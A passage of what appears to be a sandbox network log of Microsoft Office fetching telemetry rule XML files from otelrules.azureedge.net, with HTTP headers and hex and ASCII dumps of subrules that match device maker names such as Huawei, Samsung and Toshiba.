                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:10 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:10 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155410Z-174c587ffdfdwxdvhC1TEB1c4n000000033g000000007gn2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:11 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                41192.168.2.44987013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:10 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:11 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 428
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                x-ms-request-id: c569ec8c-a01e-003d-0e22-3d98d7000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155411Z-178bfbc474bxkclvhC1NYC69g400000004k000000000dcff
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:11 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                42192.168.2.44987313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:12 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:13 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 499
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155413Z-174c587ffdf8fcgwhC1TEBnn70000000036g00000000pw2h
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:13 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                43192.168.2.44987413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:13 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:13 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                x-ms-request-id: 87817176-601e-003e-034d-3c3248000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155413Z-178bfbc474bscnbchC1NYCe7eg00000004w0000000005et4
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:13 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                44192.168.2.44987713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:13 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:13 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                x-ms-request-id: 52ac3eb7-c01e-0079-7e4e-3ce51a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155413Z-15b8b599d885v8r9hC1TEB104g000000036000000000a095
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:13 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                45192.168.2.44987513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:13 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:13 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                x-ms-request-id: a24720e5-f01e-0096-3f65-3b10ef000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155413Z-178bfbc474b9fdhphC1NYCac0n00000004p0000000005cd2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:13 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                46192.168.2.44987613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:13 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:13 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                x-ms-request-id: 15a67567-d01e-0066-07eb-3bea17000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155413Z-15b8b599d88qw29phC1TEB5zag000000036g000000003dg3
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                47192.168.2.44987913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:15 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:15 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 420
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                x-ms-request-id: 03bcf0c5-601e-0002-337d-3da786000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155415Z-15b8b599d885ffrhhC1TEBtuv0000000033g00000000kx94
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:15 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                48192.168.2.44988013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:15 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:15 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155415Z-178bfbc474brk967hC1NYCfu6000000004c000000000hp9c
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                49192.168.2.44988213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:15 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:15 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                x-ms-request-id: 20caaba8-701e-005c-0363-3bbb94000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155415Z-178bfbc474bxkclvhC1NYC69g400000004kg00000000bm25
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
